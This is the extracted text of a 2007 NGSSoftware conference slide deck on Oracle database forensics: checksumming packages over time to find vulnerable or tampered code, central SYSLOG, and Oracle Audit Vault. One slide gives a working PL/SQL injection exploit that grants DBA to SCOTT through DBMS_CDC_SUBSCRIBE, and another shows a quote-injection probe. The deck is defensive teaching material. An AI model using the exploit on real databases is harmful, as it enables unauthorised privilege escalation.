Transcript Document

NGS Consulting
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Advanced Check-summing Over
Time and Oracle Audit Vault
Paul M. Wright
Security Consultant and Software Developer at NGSSoftware
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
SQL Injection in Oracle PL/SQL packages
User inserts their own SQL into the programs SQL
• Usual cause is poor input validation
• PL/SQL procedures execute with the permissions of the
definer by default ~ similar to SUID on UNIX
• SQL injected by PUBLIC will run with the privileges of SYS
via a SYS package that is definer rights.
• Privilege escalation ~ PUBLIC User to DBA
• 400+ injection vulnerabilities 2004-2007
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Example for 10g
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return
varchar2 authid current_user as pragma autonomous_transaction;
BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN ‘ ‘;
END;
/
-- Inject the function into the procedure
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');
END;
/
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Patching has its problems.
• Oracle patching is complex and has also had some
problems with reliability.
• On top of this is the problem of keeping track of the
patches that have been installed.
• Historically the recommended method to record patch
level was pen and paper.
• Oracle recommend using opatch and the inventory
records the patch activity.
• The main problem has been the unreliability of opatch
and the inventory to record completed patches.
• Solution to problem of auditing vulnerability?....
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Correlating file size and pre-written checksum
SQL> exec sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa',‘a''a');
BEGIN sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa','a''a'); END;
*
ERROR at line 1:
ORA-01756: quoted string not properly terminated
ORA-06512: at "SYS.DBMS_AQ_INV", line 566
ORA-06512: at line 1
It is vulnerable!!
--known bad checksum returns positive from this query.
SQL> SELECT OWNER, NAME FROM DBA_SOURCE WHERE
OWNER='SYS'AND NAME='DBMS_AQ_INV' AND TEXT LIKE '%786e 1907%';
OWNER
NAME
• ------------------------------ -----------------------------• SYS
DBMS_AQ_INV
Blue is checksum and green is file size. But is this sure??
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Forensics checksumming techniques used for Vulnerability detection
• Better to calculate the checksums ourselves
than rely on the ones in the DB.
• For example SYS.DBMS_CDC_SUBSCRIBE vulnerable
checksum…
(SELECTAVG(dbms_utility.get_hash_value(text,1000000000,power(2,30)
FROM DBA_SOURCE WHERE OWNER='SYS' AND
NAME='DBMS_CDC_SUBSCRIBE')INTERSECT
(SELECT 1589846530.572519083969465648854961832061 FROMDUAL);
This query returns true if vulnerable
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Checksum algorithm collisions?? Could be improved!!
• Need to add timestamps
• File size check
• Make query using fully qualified names of base tables
SELECT sys.obj$.owner#, sys.obj$.NAME, sys.source$.obj#,
Count(sys.source$.line), ctime, mtime, stime,
avg(dbms_utility.get_hash_value(source,1000000000,power(2,30)))
from sys.source$ join sys.obj$
ON sys.source$.obj#=sys.obj$.obj#
where sys.obj$.name = 'DBMS_CDC_SUBSCRIBE’
And sys.obj$.owner# = 0
GROUP BY sys.obj$.owner#, sys.source$.obj#,ctime, mtime,
stime,sys.obj$.NAME;
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Improve strength of the checksumming algorithm
•
DBMS_UTILITY.GET_HASH_VALUE is available on 7, 8, 9, 10 and
fast but has different implementation on 7 therefore a different
checksum is returned. This is not good for forensic consistency, but it is
quick so good for low priority jobs like patch checking.
•
DBMS_OBFUSCATION.MD5 is on 9 and 10 (not 8) and
cryptographically stronger than DBMS_UTILITY but slower due to the
more complex computation.
•
DBMS_CRYPTO HASH_SH1 is on 10 only and slow but the most
secure of the three. Additionally, use of MD5 and SHA1 together is not
susceptible to malicious use of a collision where two files with differing
content have the same checksum.
http://www.doxpara.com/md5_someday.pdf. By using stripwire
•
See book for an example to check the state of VIEWs in a given
schema using SHA1 algorithm:
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Check the checksummer
SELECT sys.obj$.owner#, sys.obj$.NAME,
sys.source$.obj#, Count(sys.source$.line), ctime,
mtime, stime,
avg(dbms_utility.get_hash_value(source,1000000000
,power(2,30)))
from sys.source$ join sys.obj$
ON sys.source$.obj#=sys.obj$.obj#
where sys.obj$.name = 'DBMS_UTILITY'
GROUP BY sys.obj$.owner#, sys.source$.obj#,ctime,
mtime, stime,sys.obj$.NAME;
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Reverse Engineering wrapped PLSQL
• Been able to unwrap PLSQL fully for 3 years.
• Does this conflict with the DMCA?
• Finnigan/Kornbrust have just gone public with part
implemented unwrapper.
• Is an unwrapper justified in order to audit Oracle
source code for Malware?
• Avoid that question  so…
• Another answer is within the law, reliable and free…
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
Compare ciphertext to known good
Compare the
known good
Ciphertext
from trusted
source with
the
checksummer
that is being
verified.
Copyright © 2007. NGS Software Ltd.
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
SELECT sys.obj$.owner#, sys.obj$.NAME, sys.source$.obj#, ctime, mtime, stime,
AVG(dbms_utility.get_hash_value(source,1000000000,power(2,30))) as sum
from sys.source$ inner join sys.obj$
ON sys.source$.obj#=sys.obj$.obj#
where sys.obj$.name = 'DBMS_UTILITY'
AND source like
'%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
U7Bi%‘ GROUP BY sys.obj$.owner#, sys.source$.obj#,ctime, mtime, stime,sys.obj$.NAME;
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
VIEW statechecking using SHA1 algorithm:
•
CREATE TABLE SHA1VIEWSTATES(SHA1SCHEMA VARCHAR2(40),
SHA1NAME VARCHAR2(40), SHA1CHECKSUM VARCHAR2(40));
CREATE OR REPLACE PROCEDURE
SHA1DBVIEWSTATECHECKER(lvschema in varchar2) AS TYPE C_TYPE IS
REF CURSOR;
CV C_TYPE;
string varchar2(32767);
l_hash raw(2000);
lvname VARCHAR2(30);
lvtype varchar2(30) :='VIEW';
begin
OPEN CV FOR 'SELECT DISTINCT OBJECT_NAME FROM
SYS.DBA_OBJECTS WHERE OBJECT_TYPE=''VIEW'' AND OWNER = :x' using
lvschema;
LOOP
FETCH CV INTO lvname;
DBMS_OUTPUT.ENABLE(200000);
l_hash:=dbms_crypto.hash(dbms_metadata.get_ddl(lvtype, lvname, lvschema),
dbms_crypto.hash_sh1);
dbms_output.put_line('HashSHA1='||l_hash||' Name='||lvschema||'.'||lvname);
insert into SHA1VIEWSTATES values(lvschema, lvname, l_hash);
EXIT WHEN CV%NOTFOUND;
END LOOP;
CLOSE CV;
end;
/
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
JAVA statechecking ~ often actual source of PL/SQL vulnerabilities
DECLAREV_OBJID
NUMBER:=0;V_HASH NUMBER:=0;
V_BUFFER RAW(32767);
CUR NUMBER;
RES NUMBER;
POS NUMBER;
LEN NUMBER;
BEGINDBMS_OUTPUT.ENABLE(1000000);
SELECT distinct SYS.OBJ$.OBJ# INTO V_OBJID FROM SYS.OBJ$, SYS.USER$ WHERE
SYS.USER$.USER#=SYS.OBJ$.OWNER# AND SYS.OBJ$.TYPE#=29
ANDSYS.USER$.NAME='SYS' and
SYS.OBJ$.NAME='oracle/CDC/ChangeTableTrigger';CUR:=DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(CUR,'SELECT S.PIECE FROM SYS.IDL_UB1$ S WHERE S.OBJ# =
:1',DBMS_SQL.NATIVE);
DBMS_SQL.BIND_VARIABLE(CUR, ':1',
V_OBJID);DBMS_SQL.DEFINE_COLUMN_RAW (CUR, 1, V_BUFFER, 32767);RES :=
DBMS_SQL.EXECUTE_AND_FETCH (CUR);
IF RES > 0 THEN DBMS_SQL.COLUMN_VALUE_RAW(CUR,1,V_BUFFER);
V_HASH:= V_HASH + SYS.DBMS_UTILITY.GET_HASH_VALUE(V_BUFFER,1,1073741824);
DBMS_SQL.CLOSE_CURSOR (CUR);
DBMS_OUTPUT.PUT_LINE(V_HASH);
V_BUFFER:=NULL;
END IF;
END;
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
OS level file statechecking
•
•
•
•
Tripwire and NIST NSRL known goods mainly.
UNIX sha1sum or Windows FCIV
Oracle binary in case it has been patched.
Password file in case there is an added user that may
not shown in the sys.user$ table. See paper SYSDBA
Backdoor
http://www.oracleforensics.com/wordpress/index.php/2007/10/14/sysdba-backdoor/
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Collection of statechecks over time and change management connection
•
•
•
•
•
•
•
OS checksums
PL/SQL checksums
Java checksums
Source code check for the state of the checksummer
These need storing over time for historic comparison.
Known goods and bads.
Also useful for change management
•
•
•
Keep track of development changes in production code.
DBA unofficial policy of no change.
Problem is that DBA does not actually know for sure that there has been no
change. Vulnerable files may have been reverted.
• Developers may have made unauthorised changes.
Can solve both problems of change management and security vulnerability
management with comparison of checksums over time.
•
This information is sensitive and should be kept off the server.
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Centralised SYSLOG
• Very difficult to stop PL/SQL injection privilege escalation in Oracle.
• At least need to know that it happened as a user can get from DB to
OS very easily and then delete OS based mandatory audit.
• Can’t stop this only know that it happened.
• Central SYSLOG host for Oracle i.e. not local OS based.
• 10gR2 logging to SYSLOG means that central loghost tools can now
be used to collect Oracle Audit
SQL> ALTER SYSTEM SET audit_trail=OS SCOPE=SPFILE;
SQL> ALTER SYSTEM SET audit_syslog_level=’USER.ALERT’
SCOPE=SPFILE;
System altered.
SQL> SHUTDOWN IMMEDIATE
SQL> startup
Need to keep this archived SYSLOG somewhere safe too…
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Depository
• Checksums over time archive for retrospective risk to
new zero days.
• Syslog centralised for off server mandatory audit
• SQuirreL for Oracle vulnerability scanner reports
• Safe keeping of security tools like the checksummer.
• This machine has to be very secure as it is the basis of
the rest of the organisations security.
• Bastion Host could be called a Depository.
• Similar thinking in parallel at Oracle OAV.
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
Oracle Audit Vault
Copyright © 2007. NGS Software Ltd.
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Oracle Audit Vault
•
Pro’s –
•
•
•
•
•
OS audit off the server.
Allows multiple log correlation.
Encrypted network transmission.
Good piece of software
Against •
•
Too big and complex therefore more attack surface therefore might not be the safest
place to keep this, the most security sensitive information.
Expense
If you have time and expertise implement your own Depository for SYSLOG and for the
checksums you collect over time using a hardened linux server and minirsyslogd.
At the URL below:
http://bent.latency.net/bent/darcs/minirsyslogd1.02/src/minirsyslogd1.02.tar.gz
As described in Oracle Forensics Book..
Copyright © 2007. NGS Software Ltd.
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
New book on Oracle Forensics
• Ready for purchase at
http://www.rampant-books.com
and all good book shops which
solves the problem of what to buy the
“DBA who has everything”
for Christmas this year..
Copyright © 2007. NGS Software Ltd.
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
NGS Consulting
Advanced Oracle Security Forensics at UKOUG
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Conclusions
• PL/SQL injection is a serious threat
• Forensic principles can be adapted to Oracle identify
vulnerable PL/SQL and database malware more accurately.
• Archived statechecking provides proof of historic risk.
• Also change management perspective.
• Centralised SYSLOG is needed to know a hack has
happened.
• Secure Depository required to archive this security data.
• OAV has some of these qualities and is a step in the right
direction.
• Still essential to use a good vulnerability scanner regularly.
Copyright © 2007. NGS Software Ltd.
NGS Consulting
N e xt G e n e ra tio n Se c u rity So ftw a re Ltd .
Questions?
Copyright © 2007. Next Generation Security Software Ltd.
All other trade marks are the property of their respective owner, and are used in an editorial context without intent of infringement.